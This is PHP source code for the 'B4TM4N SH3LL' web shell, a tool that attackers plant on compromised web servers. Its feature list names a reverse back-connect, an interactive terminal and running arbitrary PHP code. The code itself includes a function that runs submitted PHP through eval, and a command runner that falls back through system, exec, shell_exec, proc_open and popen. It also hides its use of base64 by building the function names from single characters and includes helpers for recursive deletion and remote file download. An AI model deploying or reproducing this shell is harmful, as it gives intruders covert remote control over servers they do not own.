2019-06-09 01:12:30 +08:00
< ? php
* Features :
* [ 0 ] File Manager
* [ 1 ] Sec . Info
* [ 2 ] Simply Database
* [ 3 ] Interactive terminal
* [ 4 ] PHP Reverse Back Connect
* [ 5 ] Run PHP Code
* [ 6 ] Custom Toolz
* [ 7 ] Self Script Encryptor !
* [ 8 ] Error Handler
* [ 9 ] Themes
* Account :
* [ Username ] B64E ( 'user' )
* [ Password ] sha1 ( md5 ( 'pass' ))
$x_ = " zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a " ;
2019-06-09 01:14:37 +08:00
2019-06-09 01:12:30 +08:00
* Self Script Encryptor v1 . 0
* ------- by k4mpr3t -------
* [ Usage ] http :// website . com / shell . php ? x = self - encryptor & name = shell_encrypt . php
$config = array (
" title " => " B4TM4N SH3LL " , // Your Title
" subtitle " => " V3RS10N 2.7 ~ k4mpr3t " , // Your Subtitle
" themes " => " br34k " , // Your Themes (D4RK or BR34K)
" debug " => false // Debug Mode
$account = explode ( ':' , $x_ );
session_start (); // Session Start
function any ( $x , $y )
return array_key_exists ( $x , $y );
function urle ( $x )
return B64E ( urlencode ( $x ));
function urld ( $x )
return urldecode ( B64D ( urldecode ( $x )));
define ( '_' , DIRECTORY_SEPARATOR );
foreach ( $_SERVER as $k => $v )
define ( strtolower ( $k ), $_SERVER [ $k ]);
function B64E ( $x )
$d = " ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ " ;
$c = " ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/ " ;
$_a = " b " ; $_b = " a " ; $_c = " s " ; $_d = " e " ; $_e = " 6 " ; $_f = " 4 " ;
$_g = " _ " ; $_h = " e " ; $_i = " n " ; $_j = " c " ; $_k = " o " ; $_l = " d " ; $_m = " e " ;
$b64 = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_h . $_i . $_j . $_k . $_l . $_m ;
return strtr ( $b64 ( $x ), $d , $c );
function B64D ( $x )
$d = " ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ " ;
$c = " ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/ " ;
$_a = " b " ; $_b = " a " ; $_c = " s " ; $_d = " e " ; $_e = " 6 " ; $_f = " 4 " ;
$_g = " _ " ; $_h = " d " ; $_i = " e " ; $_j = " c " ; $_k = " o " ; $_l = " d " ; $_m = " e " ;
$b64 = $_a . $_b . $_c . $_d . $_e . $_f . $_g . $_h . $_i . $_j . $_k . $_l . $_m ;
return $b64 ( strtr ( $x , $d , $c ));
function error ( $errno , $errstr , $errfile , $errline )
switch ( $errno )
case E_PARSE :
case E_STRICT : $errmsg = '# DEBUG' ; break ;
case E_NOTICE :
case E_USER_NOTICE : $errmsg = '# NOTICE' ; break ;
case E_RECOVERABLE_ERROR : $errmsg = '# ERROR' ; break ;
case E_WARNING :
case E_USER_WARNING : $errmsg = '# WARNING' ; break ;
case E_ERROR :
case E_COMPILE_ERROR : $errmsg = '# FATAL ERROR' ; break ;
default : $errmsg = '# UNKNOWN ERROR' ; break ;
echo '<div class="error">' ;
echo $errmsg ;
echo " <br> " ;
echo $errstr ;
echo " <br> " ;
echo $errfile . ' (Line: ' . $errline . ')' ;
echo " <br> " ;
echo " <br> " ;
echo " </div> " ;
// Login Request
if ( request_method == " POST " )
if ( any ( " username " , $_REQUEST ) && any ( " password " , $_REQUEST ) && any ( " signin " , $_REQUEST ))
if (( B64E ( $_REQUEST [ 'username' ]) == $account [ 0 ]) && ( sha1 ( md5 ( $_REQUEST [ 'password' ])) == $account [ 1 ]))
session_regenerate_id ();
$_SESSION [ 'action' ] = array (
" username " => B64E ( $_REQUEST [ 'username' ]),
" password " => sha1 ( md5 ( $_REQUEST [ 'password' ]))
// THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5)
$log = array (
" Username: " . $_REQUEST [ 'username' ],
" Password: " . $_REQUEST [ 'password' ],
" Remote IP: " . remote_addr ,
" Time: " . date ( 'Y-m-d H:i:s' ),
" ------------------------- \r \n " ,
$file = dirname ( __FILE__ ) . _ . '.log' ;
$write_log = implode ( $log , " \r \n " );
$op = fopen ( $file , 'a+' );
fwrite ( $op , $write_log );
fclose ( $op );
if ( ! any ( " action " , $_SESSION ))
?> <!doctype html>
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< meta name = " robots " content = " noindex " />
< meta name = " viewport " content = " width=device-width,initial-scale=1,shrink-to-fit=no " >
< title > Signin </ title >
< link href = " https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css " rel = " stylesheet " id = " bootstrap-css " >
< style type = 'text/css' >
html , body {
height : 100 % ;
body {
display :- ms - flexbox ;
display :- webkit - box ;
display : flex ;
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- webkit - box - align : center ;
align - items : center ;
- webkit - box - pack : center ;
justify - content : center ;
padding - top : 40 px ;
padding - bottom : 40 px ;
background - color : #f5f5f5;
. form - signin {
width : 100 % ;
max - width : 330 px ;
padding : 15 px ;
margin : 0 auto ;
. form - signin . checkbox {
font - weight : 400 ;
. form - signin . form - control {
position : relative ;
box - sizing : border - box ;
height : auto ;
padding : 10 px ;
font - size : 16 px ;
. form - signin . form - control : focus {
z - index : 2 ;
. form - signin input [ type = " email " ]{
margin - bottom :- 1 px ;
border - bottom - right - radius : 0 ;
border - bottom - left - radius : 0 ;
. form - signin input [ type = " password " ]{
margin - bottom : 10 px ;
border - top - left - radius : 0 ;
border - top - right - radius : 0 ;
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< body class = " text-center " >
< form class = " form-signin " method = 'post' >
< h1 class = " h3 mb-3 font-weight-normal " > Please sign in </ h1 >
< label for = " username " class = " sr-only " > Email address </ label >
< input type = " text " name = " username " id = " username " class = " form-control " placeholder = " Username " autocomplete = " off " required autofocus >
< label for = " password " class = " sr-only " > Password </ label >
< input type = " password " name = " password " id = " password " class = " form-control " placeholder = " Password " autocomplete = " off " required >
< button class = " btn btn-lg btn-primary btn-block " type = " submit " name = " signin " value = " signin " > Sign In </ button >
< p class = " mt-5 mb-3 text-muted " >& copy ; < ? = date ( 'Y' ) ?> </p>
</ form >
</ body >
</ html >< ? php
ob_start (); // Prevent Double Html $_REQUEST
if ( ! strpos ( strval ( ini_get ( 'disable_functions' )), 'set_time_limit' ))
set_time_limit ( 0 );
// Debug Settings
if ( $config [ 'debug' ] == true )
set_error_handler ( 'error' ); // Error Handler
error_reporting ( E_ERROR | E_WARNING | E_PARSE | E_NOTICE );
error_reporting ( 0 );
ini_set ( 'error_log' , null );
ini_set ( 'html_errors' , 0 );
ini_set ( 'log_errors' , 0 );
ini_set ( 'log_errors_max_len' , 0 );
ini_set ( 'display_errors' , 0 );
ini_set ( 'display_startup_errors' , 0 );
ini_set ( 'max_execution_time' , '600' );
ini_set ( 'memory_limit' , '256M' );
$agent = B64D ( " FT06ACQoAXYrvHYXMUIMMV5e " ); // Powered by B4TM4N
$title = $config [ 'title' ]; // Title Page
$start = microtime ( true ); // Time Pageload
?> <!DOCTYPE html>
< html >
< head >
< title >
< ? = $title ?>
</ title >
< meta name = 'author' content = 'k4mpr3t' />
< style type = " text/css " >
< ? php if ( strtolower ( $config [ 'themes' ]) == 'd4rk' ) : ?>
: root {
-- background - color : #000;
-- color : #00ff00;
-- txt - color : #fff;
-- txt - hover - color : #fff;
-- border - color : #222;
-- border - hover - color : #333;
-- table - odd - color : #000;
-- table - even - color : #111;
-- table - hover - color : #222;
-- button - color : #111;
-- button - hover - color : #222;
< ? php endif ; ?>
< ? php if ( strtolower ( $config [ 'themes' ]) == 'br34k' ) : ?>
: root {
-- background - color : #fff;
-- color : #000;
-- txt - color : #000;
-- txt - hover - color : #666;
-- border - color : #111;
-- border - hover - color : #222;
-- table - odd - color : #eee;
-- table - even - color : #ddd;
-- table - hover - color : #ccc;
-- button - color : #ccc;
-- button - hover - color : #bbb;
< ? php endif ; ?>
@ keyframes blinker { 70 % { opacity : 0 }}
* , html { margin : 0 ; padding : 0 ; line - height : 1 rem }
body { background : var ( -- background - color ); color : var ( -- color ); font - family : monospace ; font - size : 13 px }
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:: selection { background : var ( -- color ); color : var ( -- background - color )}
img { vertical - align : bottom }
hr { border : 1 px solid var ( -- border - color ); margin : 3 px 0 px 0 px }
a { color : var ( -- color ); text - decoration : none }
a : hover { color : var ( -- txt - hover - color )}
a . active { color : var ( -- txt - color )}
a . action { font - size : 12 px ; padding : 5 px ; margin : 0 px ; background : var ( -- button - color ); color : var ( -- txt - color ); border : 1 px solid #222;cursor:pointer;outline:none;display:inline-block}
a . action : hover { background : var ( -- button - hover - color ); border : 1 px solid var ( -- border - hover - color )}
label { display : inline - block ; min - width : 75 px ; padding - right : 15 px }
iframe { background : var ( -- txt - hover - color )}
fieldset { border : 1 px solid var ( -- border - color ); background : var ( -- background - color ); color : var ( -- color ); width : 100 % ; padding : 15 px ; box - sizing : border - box ; min - height : 154 px }
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input [ type = submit ]{ background : var ( -- button - color ); border : 1 px solid var ( -- border - color ); color : var ( -- txt - color ); line - height : 25 px ; padding : 0 10 px ; cursor : pointer ; outline : none }
input [ type = submit ] : hover { background : var ( -- button - hover - color ); border : 1 px solid var ( -- border - hover - color )}
input [ type = text ]{ background : var ( -- background - color ); line - height : 15 px ; color : var ( -- color ); border : 1 px solid var ( -- border - color ); width : 200 px ; padding : 5 px ; outline : none ; box - sizing : border - box }
input [ type = number ]{ background : var ( -- background - color ); line - height : 15 px ; color : var ( -- color ); border : 1 px solid var ( -- border - color ); width : 200 px ; padding : 5 px ; outline : none ; box - sizing : border - box }
input [ type = file ]{ background : var ( -- background - color ); line - height : 15 px ; color : var ( -- color ); border : 1 px solid var ( -- border - color ); width : 200 px ; padding : 2 px ; outline : none ; box - sizing : border - box }
select { background : var ( -- background - color ); color : var ( -- color ); border : 1 px solid var ( -- border - color ); width : 200 px ; padding : 5 px ; outline : none ; box - sizing : border - box }
#wrapper{width:93%;margin:37px auto 40px}
#info{margin:0 0 23px 0;padding:0 13px 0 0}
. header - left { float : left ; width : 66 % }
. header - right { float : right ; width : 34 % }
. connect - left { float : left ; width : 49 % }
. connect - right { float : right ; width : 49 % }
. database - query { float : left ; width : 49 % }
. database - process { float : right ; width : 49 % }
. php - left { float : left ; width : 49 % }
. php - right { float : right ; width : 49 % }
. divide { width : 100 % ; display : inline - block }
. divide - left { float : left ; width : 50 % }
. divide - right { float : right ; width : 50 % }
. mail input [ type = text ]{ width : 100 % ; display : block }
. database - breadcrumb { margin : 10 px 0 0 ; display : inline - block ; font - style : italic ;}
. error { animation : blinker 1 s linear infinite ; background : var ( -- color ); color : var ( -- background - color ); padding : 10 px ; margin : 10 px ;}
#logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color)}
. content { border : 1 px solid var ( -- border - color ); padding : 10 px ; overflow : auto ; overflow - y : hidden }
#process-list{padding:25px;margin:25px auto 0px;border:1px solid var(--border-color);overflow:scroll;overflow-y:hidden}
#process-list s{text-decoration:none}
. tools - header { margin - bottom : 20 px ; padding - bottom : 25 px ; text - align : center ; border - bottom : 1 px solid var ( -- border - color )}
. menu { overflow : hidden ; border - top : 1 px solid var ( -- border - color ); border - bottom : 1 px solid var ( -- border - color ); margin : 10 px 0 }
. menu > ul { list - style : none ; margin : 0 ; padding : 0 }
. menu > ul > li { margin : 0 3 px 0 0 ; padding : 10 px 7 px 10 px 7 px ; display : block ; float : left }
. menu > ul > li : hover { cursor : pointer }
. menu - tools { overflow : hidden ; border - top : 1 px solid var ( -- border - color ); border - bottom : 1 px solid var ( -- border - color ); margin : 10 px 0 }
. menu - tools > ul { list - style : none ; margin : 0 ; padding : 0 }
. menu - tools > ul > li { margin : 0 3 px 0 0 ; padding : 10 px 7 px 10 px 7 px ; display : block ; float : left }
. menu - tools > ul > li : hover { cursor : pointer }
. menu - directory {; margin - bottom : 10 px }
. new { margin - right : 15 px ;}
. hash label { min - width : 40 px ; display : inline - block ; padding - right : 15 px }
. hash - capture label { margin : 10 px 0 ; display : inline - block }
. hash input [ type = radio ]{ margin - right : 10 px ; display : inline - block ; vertical - align : middle }
. auto - number table { counter - reset : row_ }
. auto - number table tbody tr td : first - child { counter - increment : row_ ; vertical - align : middle ; text - align : center }
. auto - number table tbody tr td : first - child :: before { content : counter ( row_ )}
#thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}
#footer{margin:25px auto}
#database-query{overflow:auto;margin:10px 0}
#database label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#phpinfo table{margin:25px 0}
#phpinfo tr:nth-child(odd){background:var(--background-color)}
#phpinfo tr:nth-child(even){background:var(--border-color)}
#phpinfo td,th{padding:5px;border:1px solid var(--border-color)}
#phpinfo h1{margin:10px 0}
#phpinfo h2{margin:10px 0}
#phpinfo img{display:none}
#phpinfo hr{border:none}
. line h2 { position : relative ; top : 12 px ; width : 100 px ; display : inline ; background : var ( -- background - color ); padding : 0 10 px ; color : var ( -- txt - color )}
. line { border - bottom : 2 px solid var ( -- color ); text - align : center ; width : 287 px ; margin : auto }
. table { width : 100 % ; margin : 10 px 0 }
. table td , th { padding : 5 px ; border : 1 px solid var ( -- border - color ); max - width : 250 px ; min - width : 25 px }
. table td . kanan { word - break : break - word }
. table td . kiri { width : 30 % }
. table tr : nth - child ( odd ){ background : var ( -- table - odd - color )}
. table tr : nth - child ( even ){ background : var ( -- table - even - color )}
. table tr : hover td { background : var ( -- table - hover - color )}
. table tfoot td { padding : 10 px ; text - align : center }
. database - table > td . table { word - break : normal ;}
. map - switch { display : inline - block }
. form - fix { margin :- 15 px 0 }
. frmsource { margin - top : 10 px }
. hexdump { width : 100 % ; padding : 5 px ; margin - bottom : 5 px }
. hexdump td { text - align : left }
. highlight { background : var ( -- background - color ); word - break : break - word ; padding : 15 px ; margin - bottom : 5 px ; height : 300 px ; overflow : auto }
. hash - capture { display : inline - block ; width : 100 % }
. hash - capture - left { float : left ; width : 49 % }
. hash - capture - right { float : right ; width : 49 % }
. clr { clear : both }
. on { color : var ( -- txt - color )}
. off { color : red }
. result { padding : 10 px }
. sortable thead { cursor : pointer }
. disablefunc { overflow - wrap : break - word }
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function dean_addEvent ( t , e , r ){ if ( t . addEventListener ) t . addEventListener ( e , r , ! 1 ); else { r . $$guid || ( r . $$guid = dean_addEvent . guid ++ ), t . events || ( t . events = {}); var o = t . events [ e ]; o || ( o = t . events [ e ] = {}, t [ " on " + e ] && ( o [ 0 ] = t [ " on " + e ])), o [ r . $$guid ] = r , t [ " on " + e ] = handleEvent }} function removeEvent ( t , e , r ){ t . removeEventListener ? t . removeEventListener ( e , r , ! 1 ) : t . events && t . events [ e ] && delete t . events [ e ][ r . $$guid ]} function handleEvent ( t ){ var e =! 0 ; t = t || fixEvent ((( this . ownerDocument || this . document || this ) . parentWindow || window ) . event ); var r = this . events [ t . type ]; for ( var o in r ) this . $$handleEvent = r [ o ], ! 1 === this . $$handleEvent ( t ) && ( e =! 1 ); return e } function fixEvent ( t ){ return t . preventDefault = fixEvent . preventDefault , t . stopPropagation = fixEvent . stopPropagation , t } var stIsIE =! 1 ; if ( sorttable = { init : function (){ arguments . callee . done || ( arguments . callee . done =! 0 , _timer && clearInterval ( _timer ), document . createElement && document . getElementsByTagName && ( sorttable . DATE_RE =/^ ( \d\d ? )[ \ / \ .- ]( \d\d ? )[ \ / \ .- ](( \d\d ) ? \d\d ) $ / , forEach ( document . getElementsByTagName ( " table " ), function ( t ){ - 1 != t . className . search ( / \bsortable\b / ) && sorttable . makeSortable ( t )})))}, makeSortable : function ( t ){ if ( 0 == t . getElementsByTagName ( " thead " ) . length && ( the = document . createElement ( " thead " ), the . appendChild ( t . rows [ 0 ]), t . insertBefore ( the , t . firstChild )), null == t . tHead && ( t . tHead = t . getElementsByTagName ( " thead " )[ 0 ]), 1 == t . tHead . rows . length ){ sortbottomrows = []; for ( e = 0 ; e < t . rows . length ; e ++ ) - 1 != t . rows [ e ] . className . search ( / \bsortbottom\b / ) && ( sortbottomrows [ sortbottomrows . length ] = t . rows [ e ]); if ( sortbottomrows ){ null == t . tFoot && ( tfo = document . createElement ( " tfoot " ), t . appendChild ( tfo )); for ( e = 0 ; e < sortbottomrows . length ; e ++ ) tfo . appendChild ( sortbottomrows [ e ]); delete sortbottomrows } headrow = t . tHead . rows [ 0 ] . cells ; for ( var e = 0 ; e < headrow . length ; e ++ ) headrow [ e ] . className . match ( / \bsorttable_nosort\b / ) || ( mtch = headrow [ e ] . className . match ( / \bsorttable_ ([ a - z0 - 9 ] + ) \b / ), mtch && ( override = mtch [ 1 ]), mtch && " function " == typeof sorttable [ " sort_ " + override ] ? headrow [ e ] . sorttable_sortfunction = sorttable [ " sort_ " + override ] : headrow [ e ] . sorttable_sortfunction = sorttable . guessType ( t , e ), headrow [ e ] . sorttable_columnindex = e , headrow [ e ] . sorttable_tbody = t . tBodies [ 0 ], dean_addEvent ( headrow [ e ], " click " , sorttable . innerSortFunction = function ( t ){ if ( - 1 != this . className . search ( / \bsorttable_sorted\b / )) return sorttable . reverse ( this . sorttable_tbody ), this . className = this . className . replace ( " sorttable_sorted " , " sorttable_sorted_reverse " ), this . removeChild ( document . getElementById ( " sorttable_sortfwdind " )), sortrevind = document . createElement ( " span " ), sortrevind . id = " sorttable_sortrevind " , sortrevind . innerHTML = stIsIE ? ' <font face="webdings">5</font>' : " ▴ " , void this . appendChild ( sortrevind ); if ( - 1 != this . className . search ( / \bsorttable_sorted_reverse\b / )) return sorttable . reverse ( this . sorttable_tbody ), this . className = this . className . replace ( " sorttable_sorted_reverse " , " sorttable_sorted " ), this . removeChild ( document . getElementById ( " sorttable_sortrevind " )), sortfwdind = document . createElement ( " span " ), sortfwdind . id = " sorttable_sortfwdind " , sortfwdind . innerHTML = stIsIE ? ' <font face="webdings">6</font>' : " ▾ " , void this . appendChild ( sortfwdind ); theadrow = this . parentNode , forEach ( theadrow . childNodes , function ( t ){ 1 == t . nodeType && ( t . className = t . className . replace ( " sorttable_sorted_reverse " , " " ), t . className = t . className . replace ( " sorttable_sorted " , " " ))}), sortfwdind = document . getElementById ( " sorttable_sortfwdind " ), sortfwdind && sortfwdind . parentNode . removeChild ( sortfwdind ), sortrevind = document . getElementById ( " sorttable_sortrevind " ), sortrevind && sortrevind . parentNode . removeChild ( sortrevind ), this . className += " sorttable_sorted " , sortfwdind = document . createElement ( " span " ), sortfwdind . id = " sorttable_sortfwdind " , sortfwdind . innerHTML = stIsIE ? ' <font face="webdings">6</font>' : " ▾ " , this . appendChild ( sortfwdind ), row_array = [], col = this . sorttable_columnindex , rows = this . sorttable_tbody . rows ; for ( e = 0 ; e < rows . length ; e ++ ) row_array [ row_array . length ] = [ sorttable . getInnerText ( rows [ e ] . cells [ col ]), rows [ e ]]; row_array . sort ( this . sorttable_sortfunction ), tb = this . sorttable_tbody ; for ( var e = 0 ; e < row_array . length ; e ++ ) tb . appendChild ( row_array [ e ][ 1 ]); dele
</ script >
< script type = " text/javascript " >
var xhr ;
window . onload = function (){
getFocus ( " terminal-input " );
getFocus ( " find-action " );
getFocus ( " sourcefocus " );
getFocus ( " php-code " );
function getFocus ( id ){
if ( document . getElementById ( id ) !== null ){
document . getElementById ( id ) . focus ();}
function getAjax ( txt , id , method , url ){
var xmlhttp ;
var urlf = " " ;
var data = new FormData ();
var params = url . split ( " & " );
for ( i = 0 ; i < params . length ; i ++ ){
val = params [ i ] . split ( " = " );
if ( val [ 0 ] == 'text-encode' ){
data . append ( val [ 0 ], val [ 1 ]);
} else { if ( val [ 0 ] . indexOf ( '?' ) < 0 )
{ urlf += '&' + val [ 0 ] + '=' + val [ 1 ];}}}
if ( window . XMLHttpRequest ){ xmlhttp = new XMLHttpRequest ();
} else { xmlhttp = new ActiveXObject ( " Microsoft.XMLHTTP " );}
xmlhttp . onreadystatechange = function (){
sts = [ " Request Not Initialized " ,
" Server Connection Established " ,
" Request Received " ,
" Processing Request " ,
" Request Finished " ];
if ( xmlhttp . readyState == 4 && xmlhttp . status == 200 ){
if ( txt ){ document . getElementById ( id ) . innerHTML = xmlhttp . responseText ;
} else { document . getElementById ( id ) . value = xmlhttp . responseText ;}
} else {
if ( txt ){ document . getElementById ( id ) . innerHTML =
" [Status] " + " Please Wait... <div class='loading'></div><br> " +
" [State] " + sts [ xmlhttp . readyState ] + " <br> " +
" [Response] " + xmlhttp . response ;
} else { document . getElementById ( id ) . value =
" [Status] " + " Please Wait... \n " +
" [State] " + sts [ xmlhttp . readyState ] + " \n " +
" [Response] " + xmlhttp . response ;}}
xmlhttp . open ( method , window . location . href + urlf , true );
xmlhttp . send ( data );
xhr = xmlhttp ;
function ajaxAbort ( txt , id ){
if ( txt ){ document . getElementById ( id ) . innerHTML = " Canceled " ;
} else { document . getElementById ( id ) . value = " Canceled " ;}
xhr . abort ();
function checkAll (){
for ( var i = 0 ; i < document . getElementsByName ( 'chk[]' ) . length ; i ++ ){
document . getElementsByName ( 'chk[]' )[ i ] . checked = document . getElementsByName ( 'check-all' )[ 0 ] . checked ;}
function checkCount ( id ){
count = 1 ;
for ( var i = 0 ; i < document . getElementsByName ( 'chk[]' ) . length ; i ++ ){
if ( document . getElementsByName ( 'chk[]' )[ i ] . checked ){
document . getElementById ( id ) . innerHTML = count ++ ;
} else { document . getElementById ( id ) . innerHTML = count - 1 ;}}
function mapSwitch ( id , id2 ){
var a = document . getElementById ( id );
var b = document . getElementById ( id2 );
if ( a . style . display == 'inline-block' ){
a . style . display = 'none' ;
b . style . display = 'inline-block' ;
} else { a . style . display = 'inline-block' ;
b . style . display = 'none' ;}
function getParameter ( p ) {
var searchString = window . location . search . substring ( 1 ),
i , val , params = searchString . split ( " & " );
for ( i = 0 ; i < params . length ; i ++ ){
val = params [ i ] . split ( " = " );
if ( val [ 0 ] == p ){
return val [ 1 ];}}
return null ;
</ script >
</ head >
< body >
< div id = " wrapper " >< ? php
$cur = any ( " c " , $_SESSION ) ? urld ( $_SESSION [ 'c' ]) : getcwd ();
$dir = any ( " d " , $_REQUEST ) ? urld ( $_REQUEST [ 'd' ]) : $cur ;
$map = any ( " r " , $_REQUEST ) ? dirname ( urld ( $_REQUEST [ 'r' ])) : $dir ;
function Unix ()
return ( strtolower ( substr ( PHP_OS , 0 , 3 )) != " win " );
function Evil ( $x , $y = false )
$c = $y == true ? " ?> " . $x . " <?php " : $x ;
$evil =@ eval ( $c );
if ( error_get_last ())
print " \n [Error] " ;
return print_r ( error_get_last ());
return $evil ;
function Execute ( $x )
$x = $x . ' 2>&1' ;
if ( ! is_null ( $backtic = `$x` ))
return $backtic ;
elseif ( function_exists ( 'system' ))
ob_start ();
$system = system ( $x );
$buff = ob_get_contents ();
ob_end_clean ();
return $buff ;
elseif ( function_exists ( 'exec' ))
$buff = " " ;
exec ( $x , $results );
foreach ( $results as $result )
$buff .= $result ;
return $buff ;
elseif ( function_exists ( 'shell_exec' ))
$buff = shell_exec ( $x );
return $buff ;
elseif ( function_exists ( 'pcntl_exec' ))
$buff = pcntl_exec ( $x );
return $buff ;
elseif ( function_exists ( 'passthru' ))
ob_start ();
$passthru = passthru ( $x );
$buff = ob_get_contents ();
ob_end_clean ();
return $buff ;
elseif ( function_exists ( 'proc_open' ))
$proc = proc_open ( $x , array (
array ( " pipe " , " r " ),
array ( " pipe " , " w " ),
array ( " pipe " , " w " )
), $pipes );
$buff = stream_get_contents ( $pipes [ 1 ]);
return $buff ;
elseif ( function_exists ( 'popen' ))
$buff = " " ;
$pop = popen ( $x , " r " );
while ( ! feof ( $pop ))
$buff .= fread ( $pop , 1024 );
pclose ( $pop );
return $buff ;
return " R.I.P Command " ;
function Remove ( $x )
if ( is_dir ( $x ))
if ( $h =@ opendir ( $x ))
while ( false !== ( $f = readdir ( $h )))
if ( $f != " . " && $f != " .. " )
Remove ( $x . _ . $f );
closedir ( $h );
return rmdir ( $x );
elseif ( is_file ( $x ))
return unlink ( $x );
return false ;
function ChmodRecursive ( $x , $y )
if ( is_dir ( $x ))
if ( $h =@ opendir ( $x ))
while ( false !== ( $f = readdir ( $h )))
if ( $f != " . " && $f != " .. " )
ChmodRecursive ( $x . _ . $f );
closedir ( $h );
return chmod ( $x , $y );
elseif ( is_file ( $x ))
return chmod ( $x , $y );
return false ;
function CopyRecursive ( $x , $y )
if ( is_dir ( $x ))
@ mkdir ( $y );
if ( $h =@ opendir ( $x ))
while ( false !== ( $f = readdir ( $h )))
if ( $f != " . " && $f != " .. " )
CopyRecursive ( $x . _ . $f , $y . _ . $f );
closedir ( $h );
return true ;
elseif ( is_file ( $x ))
return copy ( $x , $y );
return false ;
function MoveRecursive ( $x , $y )
if ( is_dir ( $x ))
@ mkdir ( $y );
if ( $h =@ opendir ( $x ))
while ( false !== ( $f = readdir ( $h )))
if ( $f != " . " && $f != " .. " )
MoveRecursive ( $x . _ . $f , $y . _ . $f );
closedir ( $h );
return Remove ( $x );
elseif ( is_file ( $x ))
if ( copy ( $x , $y ))
return unlink ( $x );
return false ;
function GetDownloadUrl ( $x , $y )
global $agent ;
$fl = fopen ( $y , " w " );
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_USERAGENT , $agent );
curl_setopt ( $ch , CURLOPT_URL , $x );
curl_setopt ( $ch , CURLOPT_FILE , $fl );
curl_setopt ( $ch , CURLOPT_HEADER , 0 );
curl_setopt ( $ch , CURLOPT_SSL_VERIFYHOST , 0 );
curl_setopt ( $ch , CURLOPT_SSL_VERIFYPEER , 0 );
curl_setopt ( $ch , CURLOPT_FOLLOWLOCATION , 1 );
$rs = curl_exec ( $ch );
if ( curl_error ( $ch )) return curl_error ( $ch );
curl_close ( $ch );
fclose ( $fl );
return true ;
function GetUrlExists ( $x )
global $agent ;
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_USERAGENT , $agent );
curl_setopt ( $ch , CURLOPT_URL , $x );
curl_setopt ( $ch , CURLOPT_TIMEOUT , 5 );
curl_setopt ( $ch , CURLOPT_CONNECTTIMEOUT , 5 );
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 );
$rs = curl_exec ( $ch );
$http = curl_getinfo ( $ch , CURLINFO_HTTP_CODE );
if ( curl_error ( $ch )) return curl_error ( $ch );
curl_close ( $ch );
return ( $http >= 200 && $http < 300 );
function GetUrlContent ( $x )
global $agent ;
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_USERAGENT , $agent );
curl_setopt ( $ch , CURLOPT_URL , $x );
curl_setopt ( $ch , CURLOPT_SSL_VERIFYHOST , 0 );
curl_setopt ( $ch , CURLOPT_SSL_VERIFYPEER , 0 );
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 );
$rs = curl_exec ( $ch );
if ( curl_error ( $ch )) return curl_error ( $ch );
curl_close ( $ch );
return $rs ;
function GetUrlFromPath ( $x )
$fix_path = str_replace ( _ , '/' , $x );
$protocol = empty ( $_SERVER [ 'HTTPS' ]) || $_SERVER [ 'HTTPS' ] === 'off' ? 'http://' : 'https://' ;
$path = str_replace ( document_root , '' , $fix_path );
return $protocol . server_name . $path ;
function PostUrlContent ( $url , $content )
global $agent ;
$params = array (
'http' => array (
'method' => " POST " ,
'header' => " Content-Type: application/x-www-form-urlencoded \r \n " .
" User-Agent: $agent\r\n " ,
'content' => http_build_query ( $content )
$results = " " ;
$context = stream_context_create ( $params );
$header = get_headers ( $url );
if ( $http = substr ( $header [ 0 ], 9 , 3 ) != " 200 " )
$results = " Error: $http " ;
if ( $contents = file_get_contents ( $url , null , $context ))
$results = htmlspecialchars ( $contents );
if ( $handle = fopen ( $url , 'r' , false , $context ))
$contents = stream_get_contents ( $handle );
fclose ( $handle );
$results = htmlspecialchars ( $contents );
if ( $handle = fopen ( $url , 'r' , false , $context ))
$contents = " " ;
while ( ! feof ( $handle ))
$contents .= fread ( $handle , 10240 );
fclose ( $handle );
$results = htmlspecialchars ( $contents );
return $results ;
function GetFileType ( $x )
if ( is_file ( $x ))
return pathinfo ( $x )[ 'extension' ];
elseif ( is_dir ( $x ))
return " dir " ;
elseif ( is_link ( $x ))
return " link " ;
return " - " ;
function GetFileTime ( $x , $y )
switch ( $y )
case " create " : return date ( " Y-m-d H:i:s " , @ filectime ( $x )); break ;
case " modify " : return date ( " Y-m-d H:i:s " , @ filemtime ( $x )); break ;
case " access " : return date ( " Y-m-d H:i:s " , @ fileatime ( $x )); break ;
function GetFilePerm ( $x )
$perms =@ fileperms ( $x );
switch ( $perms & 0xF000 )
{ case 0xC000 : $info = 's' ; break ; case 0xA000 : $info = 'l' ; break ;
case 0x8000 : $info = 'r' ; break ; case 0x6000 : $info = 'b' ; break ;
case 0x4000 : $info = 'd' ; break ; case 0x2000 : $info = 'c' ; break ;
case 0x1000 : $info = 'p' ; break ; default : $info = 'u' ;}
$info .= (( $perms & 0x0100 ) ? 'r' : '-' ); $info .= (( $perms & 0x0080 ) ? 'w' : '-' );
$info .= (( $perms & 0x0040 ) ? (( $perms & 0x0800 ) ? 's' : 'x' ) : (( $perms & 0x0800 ) ? 'S' : '-' ));
$info .= (( $perms & 0x0020 ) ? 'r' : '-' ); $info .= (( $perms & 0x0010 ) ? 'w' : '-' );
$info .= (( $perms & 0x0008 ) ? (( $perms & 0x0400 ) ? 's' : 'x' ) : (( $perms & 0x0400 ) ? 'S' : '-' ));
$info .= (( $perms & 0x0004 ) ? 'r' : '-' ); $info .= (( $perms & 0x0002 ) ? 'w' : '-' );
$info .= (( $perms & 0x0001 ) ? (( $perms & 0x0200 ) ? 't' : 'x' ) : (( $perms & 0x0200 ) ? 'T' : '-' ));
